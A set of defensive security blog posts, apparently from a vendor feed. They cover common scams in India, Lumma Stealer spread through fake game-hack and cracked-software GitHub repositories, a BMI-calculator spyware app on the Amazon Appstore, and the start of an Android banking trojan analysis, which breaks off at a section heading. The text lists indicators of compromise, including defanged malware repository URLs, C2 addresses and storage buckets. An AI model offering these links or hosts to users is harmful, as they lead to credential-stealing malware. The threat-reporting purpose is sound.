Rising Scams in India: Building Awareness and Prevention

Authored by Anuradha, Sakshi Jaiswal 

In 2024, scams in India have continued to evolve, leveraging sophisticated methods and technology to exploit unsuspecting individuals. These fraudulent activities target people across demographics, causing financial losses and emotional distress. This blog highlights some of the most prevalent scams this year, how they operate, some real-world scenarios, tips to stay vigilant and what steps to be taken if you become a victim.

This blog covers the following scams:

1. WhatsApp Scam
2. Instant Loan Scam
3. Voice Cloning Scam
4. Credit Card Scam
5. Fake Delivery Scam
6. Digital Arrest Scam

1.WhatsApp Scam:

Scam Tactics:

Fraudsters on WhatsApp employ deceptive tactics to steal personal information, financial data, or gain unauthorized access to accounts. Common tactics include:

• Phishing Links: Messages with fake links mimicking trusted organizations, urging users to verify their accounts or claim rewards.
  Example: “Your account will be deactivated! Click here to verify your number now.”

Case 1: In the figure below, a user is being deceived by a message originating from the +244 country code, assigned to Angola. The message offers an unrealistic investment opportunity promising a high return in just four days, which is a common scam tactic. It uses pressure and informal language, along with a link for immediate action.

 

Case 2: In the figure below, a user is being deceived by a message originating from the +261 country code, assigned to Madagascar. The message claims that you have been hired and asks you to click a link to view the offer or contact the sender which is a scam.

• Impersonation: Scammers hijack or mimic contacts to ask for urgent financial help.
  Example: “Hey, it’s me! I lost my wallet. Can you send me ₹5,000?”
• Fake Job Offers: Messages promising high earnings from home to lure victims into scams.
  Example: “Earn ₹10,000 daily! Contact us to start now!”

Case 3: In the figure below, a user is being deceived by a message originating from the +91 country code, assigned to India. Scammers may contact you, posing as representatives of a legitimate company, offering a job opportunity. The recruiter offers an unrealistic daily income (INR 2000–8000) for vague tasks like searching keywords, which is suspicious. Despite requests, they fail to provide official company details or an email ID, raising credibility concerns. They also ask for personal information prematurely, a common red flag.

Case 4: In the figure below, a user is being deceived by a message originating from the +84 country code, assigned to Vietnam. The offer to earn money by watching a video for just a few seconds and providing a screenshot is a common tactic used by scammers to exploit individuals. They may use the link to gather personal information, or your action could lead to phishing attempts.

Case 5: In the figure below, a user is being misled by a message originating from the country codes +91, +963, and +27, corresponding to India, Syria, and South Africa, respectively. The message claims to offer a part-time job with a high salary for minimal work, which is a common tactic used by scammers to lure individuals. The use of popular names like “Amazon” and promises of easy money are red flags. The link provided might lead to phishing attempts or data theft. It’s important not to click on any links, share personal details, or respond to such unsolicited offers.

Case 6: The messages encourage you to post fake 5-star reviews for businesses in exchange for a small payment, which is unethical and often illegal. Scammers use such tactics to manipulate online ratings, and the provided links could lead to phishing sites or malware. Avoid engaging with these messages, clicking on the links, or participating in such activities.

 

• Lottery/Giveaway Fraud: Claims of winning a prize, requiring advance payments or sharing bank details.
  Example: “Congrats! You’ve won ₹1,00,000 in the WhatsApp Lottery. Share your bank details to claim.”
• Malware Links: Messages containing harmful links disguised as videos, photos, or documents, designed to infect your device.
  Example: “Look at this amazing video! [malicious link]”
• Wedding Invite Scam: Fraudsters send fake wedding invitations with malicious links. Clicking the links can download .apk file and install malware, steal personal or financial information, or gain unauthorized access to a WhatsApp account. Always verify the sender and avoid clicking suspicious links.
• Verification Code Theft: Fraudsters trick users into sharing their WhatsApp verification codes, enabling account hijacking.

How to Identify WhatsApp Scams:

• Unsolicited Messages: Be cautious of unexpected messages, especially from unknown numbers.
• Sense of Urgency: Scammers often create panic, pressuring you to act quickly.
• Poor Language: Messages may contain spelling or grammatical errors, indicating they are not from legitimate sources.
• Generic Greetings: Messages lack personalization, such as using “Dear Customer” instead of your name.
• Too Good to Be True Offers: High-value rewards, jobs, or opportunities with no clear justification.
• Suspicious Links: Shortened or unrecognizable URLs that redirect to fake websites.

Impact:

• Financial Loss: Victims may transfer money or share bank details, resulting in unauthorized transactions.
• Identity Theft: Personal information can be misused for fraudulent activities.
• Account Hijacking: Losing access to your WhatsApp account if verification codes are shared.
• Privacy Breach: Sensitive data from your chats or device can be exploited.
• Emotional Distress: Scams can cause stress, anxiety, and a loss of trust in technology or personal relationships.

Prevention:

• Verify Sender Identity: Confirm any request for money or sensitive information directly with the person through alternate means.
• Avoid Clicking on Links: Always verify the legitimacy of links before clicking.
• Enable Two-Step Verification: Secure your WhatsApp account with a PIN for added protection.
• Restrict Profile Access: Adjust privacy settings to limit who can view your profile photo, status, and other details.
• Be Cautious of Urgent Requests: Fraudulent messages often pressure you to act immediately. Take a moment to evaluate.
• Check Authenticity: Research offers or schemes mentioned in messages to ensure they are legitimate.
• Report and Block: Use WhatsApp’s “Report” feature to flag suspicious contacts and block them.

 

2. Instant Loan Scam:

Scam Tactics:

• Fake Loan Apps or Websites: Scammers create fake loan apps or websites that appear legitimate. They promise easy loans with minimal requirements and fast disbursements.
• Personal Information Harvesting: To apply for these loans, victims are asked to provide sensitive personal information, such as bank details, Aadhaar numbers, and other financial information.
• Advance Fee Demand: Once the application is submitted, the scammers claim that an advance fee, processing charge, or security deposit is required before the loan can be disbursed.
• Excessive Interest Rates: If the loan is approved, it often comes with extraordinarily high interest rates or hidden charges, leading the borrower into a debt trap.
• Threats and Harassment: If the victim is unable to repay the loan, scammers may use aggressive tactics, including blackmail, threats of legal action, or public humiliation to force repayment.

How to Identify Instant Loan Scam:

• Unsolicited Offers: Be wary of loan offers you receive unexpectedly via calls, emails, or ads.
• Too Good to Be True: If the loan offer seems unusually easy, with little paperwork or no credit checks, it’s likely a scam.
• Advance Fees: Genuine lenders never ask for upfront payments before disbursing a loan.
• Excessive Interest Rates: Watch out for loans with outrageously high interest rates or hidden fees.
• Unprofessional Communication: Look for red flags like poorly written messages or vague, generic offers.
• Pressure to Act Fast: Scammers often create urgency, pushing you to make quick decisions without proper verification.

Impact:

• Financial Losses: Victims are often tricked into paying exorbitant fees, with no loan ever being disbursed, or receiving loans with unaffordable repayment terms.
• Emotional Distress: The constant harassment, along with the fear of financial ruin, leads to significant emotional and mental stress for victims.

Prevention:

• Verify Loan Providers: Always check the legitimacy of loan apps or websites by reading reviews and verifying their authenticity through trusted sources.
• Avoid Sharing Sensitive Information: Never share personal or financial information unless you’re sure of the legitimacy of the platform.
• Report Suspicious Platforms: If you come across a suspicious loan provider, report it to relevant authorities like the Reserve Bank of India (RBI) or consumer protection agencies.
• Be Cautious with Quick Loans: Instant loans with no credit checks or paperwork should raise immediate suspicion. Always read the terms and conditions carefully.

 

3. Voice-Cloning Scam:

Voice-cloning scams use advanced AI technology to replicate the voices of familiar people, such as friends, family members, or colleagues, to manipulate victims into transferring money or providing sensitive information.

Scam Tactics:

• Impersonating Trusted Voices: Scammers use voice-cloning technology to mimic the voice of a person the victim knows, often creating a sense of trust and urgency.
• Urgent Requests for Money: The cloned voice typically claim an emergency, such as needing money for medical expenses or legal issues, pressuring the victim to act quickly.
• Sensitive Information Requests: Scammers may also use voice cloning to trick victims into revealing personal information, passwords, or financial details.

How to Identify AI Voice-Cloning Scams:

• Verify the Country Code: Check the country code of the incoming call to ensure it matches the expected location.
• Contact the Person Directly: If possible, reach out to the person through another method to confirm the authenticity of the call.
• Notice Changes in Speech Tone or Patterns: Be alert to any changes in the speaker’s tone or unnatural speech patterns that may indicate a scam.

Impact:

• Financial Losses
• Emotional and Psychological Stress

Prevention

• Verify the Caller: Always verify the caller’s identity through an alternative channel before proceeding with any action.
• Be Skeptical of Urgency: Take your time and evaluate urgent requests carefully, especially those involving money.
• Check the Country Code: Be cautious if the call comes from an unfamiliar country code.
• Listen for Inconsistencies: Pay attention to unusual speech patterns or background noises.
• Limit Information Sharing: Never share sensitive details over the phone unless you’re sure of the caller’s identity.
• Use Multi-Factor Authentication: Add extra security to sensitive accounts with multi-factor authentication.
• Stay Informed: Educate yourself and others, especially vulnerable individuals, about voice cloning scams.

 

4. Credit Card Scam:

Scam Tactics

Scammers use various methods to deceive victims into revealing credit card information or making unauthorized payments:

• Phishing: Fake emails, texts, or websites pretending to be from a legitimate entity (e.g., banks or online stores). Victims are tricked into providing card details or logging into a fake account portal.

• Skimming: Devices installed on ATMs or payment terminals capture card information. Hidden cameras or fake keypads may record PINs.

• Vishing (Phone Scams): Scammers impersonate bank representatives or government officials. They ask for credit card details, PINs, or OTPs to “resolve an issue.”

• Fake Online Shopping Websites: Fraudulent e-commerce sites offer deals to steal card details during fake transactions.

How to identify Credit card scam:

• Unsolicited Contact: Unexpected calls, emails, or messages asking for sensitive information.
• Urgency: Claims of account suspension or fraudulent activity requiring immediate action.
• Generic Greetings: Messages addressing you as “Dear Customer” or similar vague terms.
• Suspicious Links: Links in emails or texts that lead to fake websites.
• Unfamiliar Transactions: Small charges on your statement that you don’t recognize.

Impact:

• Loss of Money: Unauthorized purchases can drain your account.
• Identity Theft: Scammers can misuse your personal details.
• Credit Problems: Fraudulent charges could damage your credit score.
• Stress: Victims often face anxiety and frustration.
• Legal Issues: You may need to dispute fraudulent transactions.

Prevention:

• Don’t Share Card Details: Never share your card number, CVV, PIN, or OTP with anyone.
• Shop on Secure Websites: Only enter card details on sites with “https://” and a padlock icon.
• Avoid Suspicious Offers: Don’t click on links offering unbelievable discounts or rewards.
• Check Your Transactions: Regularly review your bank statements for unauthorized charges.
• Enable Alerts: Set up notifications for every card transaction to catch fraud early.
• Protect Your Card: Be cautious at ATMs and shops to avoid skimming.
• Use Virtual Cards: For online shopping, use one-time-use virtual cards if your bank provides them.
• Install Security Software: Keep your devices safe with antivirus software to block phishing attempts.
• Report Lost Cards: Inform your bank immediately if your card is lost or stolen.

 

5. Fake Delivery Scam:

Scam Tactics:

In fake delivery scams, fraudsters pose as delivery services to trick you into providing personal information, card details, or payment. Common tactics include:

• Phishing Messages: Scammers send texts or emails claiming there’s an issue with your package delivery. They include links to fake websites asking for payment or details.
• Example: “Your package couldn’t be delivered. Pay ₹50 to reschedule: [fake link].”
• Impersonation Calls: Fraudsters call pretending to be delivery agents, saying extra charges are needed to complete the delivery.
• Fake Delivery Attempts: A scammer posing as a delivery person asks for cash-on-delivery payment for a package you never ordered.
• Malware Links: Links in fake delivery notifications may install malware on your device, stealing sensitive information.

How to Identify Fake Delivery Scams:

• Unexpected Notifications: You receive a delivery message for a package you didn’t order.
• Urgent Payment Requests: The scam demands immediate action, such as paying a fee to receive your package.
• Suspicious Links: Links in the message look unusual or redirect to websites that don’t match the official delivery service.
• No Tracking Information: Legitimate delivery companies provide proper tracking numbers. Fake messages often lack these or give invalid ones.
• Unprofessional Communication: Scammers’ messages may contain spelling errors, awkward language, or lack the company’s official logo.

Impact:

• Financial Loss: Victims may lose money through fake payment requests.
• Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
• Device Infection: Clicking on malicious links can infect your device with malware or spyware.
• Emotional Stress: Victims may feel anxious or distressed about being targeted.
• Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

Prevention:

• Financial Loss: Victims may lose money through fake payment requests.
• Personal Data Theft: Scammers can steal personal information like credit card details or addresses.
• Device Infection: Clicking on malicious links can infect your device with malware or spyware.
• Emotional Stress: Victims may feel anxious or distressed about being targeted.
• Identity Theft: Stolen data can be used for fraud, such as opening accounts in your name.

 

6. Digital Arrest Scam

Scam Tactics:

Scammers pose as police officers or government officials, accusing victims of being involved in illegal activities like money laundering or cybercrime. They intimidate victims by threatening arrest or legal action unless immediate payment is made to “resolve the matter.”

• Impersonation and Urgency: Scammers pose as authorities, creating a sense of urgency with threats of arrest or legal consequences to pressure victims.
• Demands for Payment or Data: They demand immediate payments through untraceable methods or request sensitive personal information for identity theft.
• Deceptive Tactics: Techniques like fake documents, spoofed contacts, and social engineering are used to make the scam appear credible and manipulate victims.

How to Identify Digital Arrest Scam:

• Unsolicited Contact: Be cautious of unexpected calls or messages claiming to be from authorities.
• Urgency and Threats: Scammers often pressure victims with threats of immediate arrest unless payment is made.
• Requests for Payment: Legitimate authorities don’t ask for payment over the phone.
• Unverified Claims: Always verify legal claims by contacting authorities directly through official channels.
• Isolation Tactics: If asked not to consult others, it’s a red flag.
• Sensitive Information Requests: Never share personal or financial details over the phone.
• Unprofessional Communication: Look for poorly written or vague messages.

Impact: Daily losses from such scams run into lakhs, as victims panic and transfer money or provide sensitive information under pressure.

Prevention:

• Verify any claims of legal accusations directly with the authorities.
• Avoid sharing personal or financial information over the phone.
• Remember: Genuine law enforcement agencies do not demand payment over the phone.

What to Do if You Fall Victim

If you’ve fallen victim to any of the mentioned scams—Digital Arrest Scam, Instant Loan Scam, Voice Cloning Scam, WhatsApp Scam, Fake Delivery Scam or Credit Card Scam—it’s important to take immediate action to minimize damage and protect your finances and personal information. Here are common tips and steps to follow for all these scams:

1. Report the Scam Immediately:

• File a Complaint: Report the scam to your local authorities or cybercrime cell. In India, you can file complaints with the Cyber Crime Portal or your local police station. For instant assistance, Dial 1930 to report cybercrime.
• Inform Your Bank/Financial Institution: If you’ve shared financial details (e.g., bank account or credit card info), contact your bank or credit card provider immediately to block any transactions and prevent further losses.
• Contact Your Mobile Service Provider: For scams involving SIM cards or mobile-based fraud (like voice cloning or WhatsApp scams), reach out to your service provider to block the number or disable the SIM.

2. Secure Your Online Accounts:

• Change Passwords: Immediately change passwords for any accounts that may have been compromised (banking, email, social media). Use strong, unique passwords for each account.
• Enable Two-Factor Authentication (2FA): Activate two-factor authentication on your important accounts (e.g., email, bank, social media) to add an extra layer of security.
• Review Account Activity: Look for unauthorized transactions or changes to your account settings and report them.

3. Monitor Your Financial Statements:

• Bank and Credit Card Statements: Regularly check your financial statements for unauthorized transactions. If you see any suspicious activity, report it to your bank immediately.
• Freeze Your Credit: In cases of credit card scams or loan-related fraud, consider placing a freeze on your credit with major credit bureaus to prevent new accounts from being opened in your name.

4. Do Not Respond to Unsolicited Messages:

• If you receive unsolicited calls, messages, or emails asking for personal information, do not respond. Scammers often use these methods to steal sensitive data.
• Do not click on links or download attachments from unknown sources.

5. Be Cautious with Personal Information:

• Never share sensitive information like your PIN, passwords, or OTP over the phone or through insecure channels like SMS or email.
• Digital Arrest Scam: If you receive a threatening message about being arrested, verify the information through official government sources or your local police. Authorities will never demand payment for legal issues.

6. Report the Phone Number/Email:

• If the scam came via WhatsApp, SMS, or phone calls, report the number to the respective platform. For WhatsApp, you can block the number and report it directly in the app. Similarly, report phishing emails to your email provider.

7. Preserve Evidence:

• Save Screenshots or Records: Keep any evidence (messages, emails, screenshots, etc.) that can be used to investigate the scam. These may be useful when filing a complaint or disputing fraudulent transactions.

8. Educate Yourself and Others:

• Stay informed about the latest scams and fraud tactics. Being aware of common signs of scams (e.g., too-good-to-be-true offers, urgent demands for money, etc.) can help you avoid future threats.

 

Conclusion:

As scams in India continue to grow in number and sophistication, it is crucial to raise awareness to protect individuals and businesses from falling victim to these fraudulent schemes. Scams such as phishing, fake job offers, credit card scams, loan scams, investment frauds and online shopping frauds are increasingly targeting unsuspecting victims, causing significant financial loss and emotional harm.

By raising awareness of scam warning signs and encouraging vigilance, we can equip individuals to make safer, more informed decisions online. Simple precautions, such as verifying sources, being cautious of unsolicited offers, and safeguarding personal and financial information, can go a long way in preventing scams.

It is essential for both individuals and organizations to stay informed and updated on emerging scam tactics. Through continuous awareness and proactive security measures, we can reduce the impact of scams, ensuring a safer and more secure digital environment for everyone in India.

The post Rising Scams in India: Building Awareness and Prevention appeared first on McAfee Blog.

GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools

Authored by Aayush Tyagi

Video game hacks, cracked software, and free crypto tools remain popular bait for malware authors. Recently, McAfee Labs uncovered several GitHub repositories offering these tempting “rewards,” but a closer look reveals something more sinister. As the saying goes, if it seems too good to be true, it probably is.

GitHub is often exploited for malware distribution due to its accessibility, trustworthiness, and developer-friendly features. Attackers can easily create free accounts and host repositories that appear legitimate, leveraging GitHub’s reputation to deceive users.

McAfee Labs encountered multiple repositories, offering game hacks for top-selling video games such as Apex Legends, Minecraft, Counter Strike 2.0, Roblox, Valorant,
Fortnite, Call of Duty, GTA V and or offering cracked versions of popular software and services, such as Spotify Premium, FL Studio, Adobe Express, SketchUp Pro, Xbox Game Pass, and Discord to name a few.

Executive summary

These attack chains begin when users would search for Game Hacks, cracked software or tools related to Cryptocurrency on the internet, where they would eventually come across GitHub repositories or YouTube Videos leading to such GitHub repositories, offering such software.

We noticed a network of such repositories where the description of software keeps on changing, but the payload remains the same: a Lumma Stealer variant. Every week, a new set of repositories with a new malware variant is released, as the older repositories are detected and removed by GitHub. These repositories also include distribution licenses and software screenshots to enhance their appearance of legitimacy.

 

Figure 1: Attack Vector

These repositories also contain instructions on how to download and run the malware and ask the user to disable Windows Defender or any AV software, before downloading the malware. They provide the reasoning that, since the software is related to game hacks or by-passing software authentication or crypto-currency mining, AV products will detect and delete these applications.

This social engineering technique, combined with the trustworthiness of GitHub works well in the favor of malware authors, enabling them to infect more users.

Children are frequently targeted by such scams, as malware authors exploit their interest in game hacks by highlighting potential features and benefits, making it easier to infect more systems.

 

Technical Analysis

As discussed above, the users would come across malicious repositories through searching the internet (highlighted in red).

Figure 2: Internet Search showing GitHub results.

Or through YouTube videos, that contain a link to the repository in the description (highlighted in red).

Figure 3: YouTube Video containing malicious URL in description.

 

Once the user accesses the GitHub repository, it contains a Distribution license and other supporting files, to trick the user into thinking that the repository is genuine and credible.

Figure 4: GitHub repository containing Distribution license.

 

Repositories also contain a detailed description of the software and installation process further manipulating the user.

Figure 5: Download instructions present in the repository.

 

Sometimes, the repositories contain instructions to disable AV products, misleading users to infect themselves with the malware.

Figure 6: Instructions to disable Windows Defender.

 

To target more children, repositories contain a detailed description of the software; by highlighting all the features included within the package, such as Aimbots and Speed Hacks, and how easily they will be able to gain an advantage over their opponents.

They even mention that the package comes with advance Anti-Ban system, so their account won’t be suspended, and that the software has a popular community, to create a perception that, since multiple users are already using this software, it must be safe to use and that, by not using the software, they are missing out.

Figure 7: Features mentioned in the GitHub repository.

 

The downloaded files, in most cases, were Lumma Stealer variants, but observing the latest repositories, we noticed new malware variants were also being distributed through the same infection vector.

Once the user downloads the file, they get the following set of files.

Figure 8: Files downloaded from GitHub repository.

 

On running the ‘Loader.exe’ file, as instructed, it iterates through the system and the registry keys to collect sensitive information.

Figure 9: Loader.exe checking for Login credentials for Chrome.

 

It searches for crypto wallets and password related files. It searches for a list of browsers installed and iterates through user data, to gather anything useful.

Figure 10: Loader.exe checking for Browsers installed on the system.

 

Then the malware connects to C2 servers to transfer data.

 Figure 11: Loader.exe connecting to C2 servers to transfer data.

This behavior is similar to the Lumma Stealer variants we have seen earlier.

 

 

Detection and Mitigation Strategies

McAfee blocks this infection chain at multiple stages:

1. URL blocking of the GitHub repository.

Figure 12: McAfee blocking URLs

2. Detecting downloaded malware.

Figure 13: McAfee blocking the malicious file

 

Conclusion and Recommendations

In conclusion, the GitHub repository infection chain demonstrates how cybercriminals exploit accessibility and trustworthiness of popular websites such as GitHub, to distribute malware like Lumma Stealer. By leveraging the user’s desire to use game hacks, to be better at a certain video game or obtain licensed software for free, they trick users into infecting themselves.

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the GitHub repository technique. Here are our recommended mitigations and remediations:

1. Children are usually the prime targets for such scams, it is important to educate the young ones and teach them how to avoid such fishy websites.
2. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
3. Install and maintain updated antivirus and anti-malware software on all endpoints.
4. Use network segmentation to limit the spread of malware within the organization.
5. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
6. Avoid downloading cracked software or visiting suspicious websites.
7. Verify URLs in emails, especially from unknown or unexpected sources.
8. Keep antivirus solutions updated and actively scanning.
9. Avoid downloading Game hacks or Crypto software from unofficial websites.
10. If possible, read reviews about the software you’re downloading and see what other users are saying about the malware.
11. Regularly patch browsers, operating systems, and applications.
12. Monitor the Temp folder for unusual or suspicious files.

Indicators of Compromise (IoCs)

As of publishing this blog, these are the GitHub repositories that are currently active.

File Type	SHA256/URLs
URLs	github[.]com/632763276327ermwhatthesigma/hack-apex-1egend
	github[.]com/VynnProjects/h4ck-f0rtnite
	github[.]com/TechWezTheMan/Discord-AllinOne-Tool
	github[.]com/UNDERBOSSDS/ESET-KeyGen-2024
	github[.]com/Rinkocuh/Dayz-Cheat-H4ck-A1mb0t
	github[.]com/Magercat/Al-Photoshop-2024
	github[.]com/nate24321/minecraft-cheat2024
	github[.]com/classroom-x-games/counter-str1ke-2-h4ck
	github[.]com/LittleHa1r/ESET-KeyGen-2024
	github[.]com/ferhatdermaster/Adobe-Express-2024
	github[.]com/CrazFrogb/23fasd21/releases/download/loader/Loader[.]Github[.]zip
	github[.]com/flashkiller2018/Black-Ops-6-Cheats-including-Unlocker-Tool-and-RICOCHET-Bypass
	github[.]com/Notalight/h4ck-f0rtnite
	github[.]com/Ayush9876643/r0blox-synapse-x-free
	github[.]com/FlqmzeCraft/cheat-escape-from-tarkov
	github[.]com/Ayush9876643/cheat-escape-from-tarkov
	github[.]com/Ayush9876643/rust-hack-fr33
	github[.]com/ppetriix/rust-hack-fr33
	github[.]com/Ayush9876643/Roblox-Blox-Fruits-Script-2024
	github[.]com/LandonPasana21/Roblox-Blox-Fruits-Script-2024
	github[.]com/Ayush9876643/Rainbow-S1x-Siege-Cheat
	github[.]com/Ayush9876643/SonyVegas-2024
	github[.]com/123456789433/SonyVegas-2024
	github[.]com/Ayush9876643/Nexus-Roblox
	github[.]com/cIeopatra/Nexus-Roblox
	github[.]com/Ayush9876643/m0dmenu-gta5-free
	github[.]com/GerardoR17/m0dmenu-gta5-free
	github[.]com/Ayush9876643/minecraft-cheat2024
	github[.]com/RakoBman/cheat-apex-legends-download
	github[.]com/Ayush9876643/cheat-apex-legends-download
	github[.]com/cIiqued/FL-Studio
	github[.]com/Ayush9876643/FL-Studio
	github[.]com/Axsle-gif/h4ck-f0rtnite
	github[.]com/Ayush9876643/h4ck-f0rtnite
	github[.]com/SUPAAAMAN/m0dmenu-gta5-free
	github[.]com/atomicthefemboy/cheat-apex-legends-download
	github[.]com/FlqmzeCraft/cheat-escape-from-tarkov
	github[.]com/Notalight/h4ck-f0rtnite
	github[.]com/Notalight/FL-Studio
	github[.]com/Notalight/r0blox-synapse-x-free
	github[.]com/Notalight/cheat-apex-legends-download
	github[.]com/Notalight/cheat-escape-from-tarkov
	github[.]com/Notalight/rust-hack-fr33
	github[.]com/Notalight/Roblox-Blox-Fruits-Script-2024
	github[.]com/Notalight/Rainbow-S1x-Siege-Cheat
	github[.]com/Notalight/SonyVegas-2024
	github[.]com/Notalight/Nexus-Roblox
	github[.]com/Notalight/minecraft-cheat2024
	github[.]com/Notalight/m0dmenu-gta5-free
	github[.]com/ZinkosBR/r0blox-synapse-x-free
	github[.]com/ZinkosBR/cheat-escape-from-tarkov
	github[.]com/ZinkosBR/rust-hack-fr33
	github[.]com/ZinkosBR/Roblox-Blox-Fruits-Script-2024
	github[.]com/ZinkosBR/Rainbow-S1x-Siege-Cheat
	github[.]com/ZinkosBR/Nexus-Roblox
	github[.]com/ZinkosBR/m0dmenu-gta5-free
	github[.]com/ZinkosBR/minecraft-cheat2024
	github[.]com/ZinkosBR/h4ck-f0rtnite
	github[.]com/ZinkosBR/FL-Studio
	github[.]com/ZinkosBR/cheat-apex-legends-download
	github[.]com/EliminatorGithub/counter-str1ke-2-h4ck
	Github[.]com/ashishkumarku10/call-0f-duty-warz0ne-h4ck
EXEs	CB6DDBF14DBEC8AF55986778811571E6
	C610FD2A7B958E79F91C5F058C7E3147
	3BBD94250371A5B8F88B969767418D70
	CF19765D8A9A2C2FD11A7A8C4BA3DEDA
	69E530BC331988E4E6FE904D2D23242A
	35A2BDC924235B5FA131095985F796EF
	EB604E2A70243ACB885FE5A944A647C3
	690DBCEA5902A1613CEE46995BE65909
	2DF535AFF67A94E1CDAD169FFCC4562A
	84100E7D46DF60FE33A85F16298EE41C
	00BA06448D5E03DFBFA60A4BC2219193
C2 Domains	104.21.48.1
	104.21.112.1
	104.21.16.1

 

The post GitHub’s Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools appeared first on McAfee Blog.

Spyware distributed through Amazon Appstore

Authored by Wenfeng Yu and ZePeng Chen

As smartphones have become an integral part of our daily lives, malicious apps have grown increasingly deceptive and sophisticated. Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon App Store, which is secretly stealing the package name of installed apps and incoming SMS messages under the guise of a simple health tool. McAfee reported the discovered app to Amazon, which took prompt action, and the app is no longer available on Amazon Appstore.

Figure 1. Application published on Amazon Appstore

 

Superficial Functionality: Simple BMI Calculation

On the surface, this app appears to be a basic tool, providing a single page where users can input their weight and height to calculate their BMI. Its interface looks entirely consistent with a standard health application. However, behind this innocent appearance lies a range of malicious activities.

Figure 2. Application MainActivity

 

Malicious Activities: Stealing Private Data

Upon further investigation, we discovered that this app engages in the following harmful behaviors:

1. Screen Recording: The app starts a background service to record the screen and when the user clicks the “Calculate” button, the Android system will pop up request screen recording permission message and start screen recording. This functionality is likely to capture gesture passwords or sensitive data from other apps. In the analysis of the latest existing samples, it was found that the developer was not ready for this function. The code did not upload the recorded mp4 file to the C2 server, and at the beginning of the startRecording() method, the developer added a code that directly returns and does not execute follow code.

Figure 3. Screen Recorder Service Code

 

When the recording starts, the permission request dialog will be displayed.

Figure 4. Start Recording Request.

 

2. Installed App Information: The app scans the device to retrieve a list of all installed applications. This data could be used to identify target users or plan more advanced attacks.

Figure 5. Upload User Data

 

3. SMS Messages: It intercepts and collects all SMS messages received on the device, potentially to capture one-time password (OTP), verification codes and sensitive information. The intercepted text messages will be added to Firebase (storage bucket: testmlwr-d4dd7.appspot.com).

Malware under development:

According to our analysis of historical samples, this malicious app is still under development and testing stage and has not reached a completed state. By searching for related samples on VirusTotal based on the malware’s package name (com.zeeee.recordingappz) revealed its development history. We can see that this malware was first developed in October 2024 and originally developed as a screen recording app, but midway through the app’s icon was changed to the BMI calculator, and the payload to steal SMS messages was added in the latest version.

Figure 6. The Timeline of Application Development

 

The address of the Firebase Installation API used by this app uses the character “testmlwr” which indicates that this app is still in the testing phase.

App Developer Information:

According to the detailed information about this app product on the Amazon page, the developer’s name is: “PT. Visionet Data Internasional”. The malware author tricked users by abusing the names of an enterprise IT management service provider in Indonesia to distribute this malware on Amazon Appstore. This fact suggests that the malware author may be someone with knowledge of Indonesia.

Figure 7. Developer Information

 

How to Protect Yourself

To avoid falling victim to such malicious apps, we recommend the following precautions:

1. Install Trusted Antivirus Apps: Use reliable antivirus software to detect and prevent malicious apps before they can cause harm.
2. Review Permission Requests: When installing an app, carefully examine the permissions it requests. Deny any permissions that seem unrelated to its advertised functionality. For instance, a BMI calculator has no legitimate reason to request access to SMS or screen recording.
3. Stay Alert: Watch for unusual app behavior, such as reduced device performance, rapid battery drain, or a spike in data usage, which could indicate malicious activity running in the background.

Conclusion

As cybercrime continues to evolve, it is crucial to remain vigilant in protecting our digital lives. Apps like “BMI CalculationVsn” serve as a stark reminder that even the simplest tools can harbor hidden threats. By staying alert and adopting robust security measures, we can safeguard our privacy and data.

IoC

Distribution website:

• hxxps://www.amazon.com/PT-Visionet-Data-Internasional-CalculationVsn/dp/B0DK1B7ZM5/

C2 servers/Storage buckets:

• hxxps://firebaseinstallations.googleapis.com/v1/projects/testmlwr-d4dd7
• hxxps://6708c6e38e86a8d9e42ffe93.mockapi.io/
• testmlwr-d4dd7.appspot.com

Sample Hash:

• 8477891c4631358c9f3ab57b0e795e1dcf468d94a9c6b6621f8e94a5f91a3b6a

The post Spyware distributed through Amazon Appstore appeared first on McAfee Blog.

A New Android Banking Trojan Masquerades as Utility and Banking Apps in India

Authored by Dexter Shin

Over the years, cyber threats targeting Android devices have become more sophisticated and persistent. Recently, McAfee Mobile Research Team discovered a new Android banking trojan targeting Indian users. This malware disguises itself as essential services, such as utility (e.g., gas or electricity) or banking apps, to get sensitive information from users. These types of services are vital for daily life, making it easier to lure users. We have previously observed malware that masquerades as utility services in Japan. As seen in such cases, utility-related messages, such as warnings that gas service will disconnect soon unless the bill is checked, can cause significant alarm and prompt immediate action from the users.

We have identified that this malware has infected 419 devices, intercepted 4,918 SMS messages, and stolen 623 entries of card or bank-related personal information. Given the active malware campaigns, these numbers are expected to rise. McAfee Mobile Security already detects this threat as Android/Banker. For more information, visit McAfee Mobile Security

Phishing through messaging platforms like WhatsApp

As of 2024, India is the country with the highest number of monthly active WhatsApp users. This makes it a prime target for phishing attacks. We’ve previously introduced another Banker distributed via WhatsApp. Similarly, we suspect that the sample we recently found also uses messaging platforms to reach individual users and trick them into installing a malicious APK. If a user installs this APK, it will allow attackers to steal the victim’s financial data, thereby accomplishing their malicious goal.

Figure 1. Scammer messages reaching users via Whatsapp (source: reddit)

 

Inside the malware

The malware we first identified was pretending to be an app that allowed users to pay their gas bills. It used the logo of PayRup, a digital payment platform for public service fees in India, to make it look more trustworthy to users.

Figure 2. Malware disguised as gas bills digital payment app

 

Once the app is launched and the permissions, which are designed to steal personal data such as SMS messages, are granted, it asks the user for financial information, such as card details or bank account information. Since this malware pretends to be an app for paying bills, users are likely to input this information to complete their payments. On the bank page, you can see major Indian banks like SBI and Axis Bank listed as options.

Figure 3. Malware that requires financial data

 

If the user inputs their financial information and tries to make a payment, the data is sent to the command and control (C2) server. Meanwhile, the app displays a payment failure message to the user.

Figure 4. Payment failure message displayed but data sent to C2 server

 

One thing to note about this app is that it can’t be launched directly by the user through the launcher. For an Android app to appear in the launcher, it needs to have “android.intent.category.LAUNCHER” defined within an <intent-filter> in the AndroidManifest.xml. However, since this app doesn’t have that attribute, its icon doesn’t appear. Consequently, after being installed and launched from a phishing message, users may not immediately realize the app is still installed on their device, even if they close it after seeing messages like “Bank Server is Down”, effectively keeping it hidden.

Figure 5. AndroidManifest.xml for the sample

 

Exploiting Supabase for data exfiltration

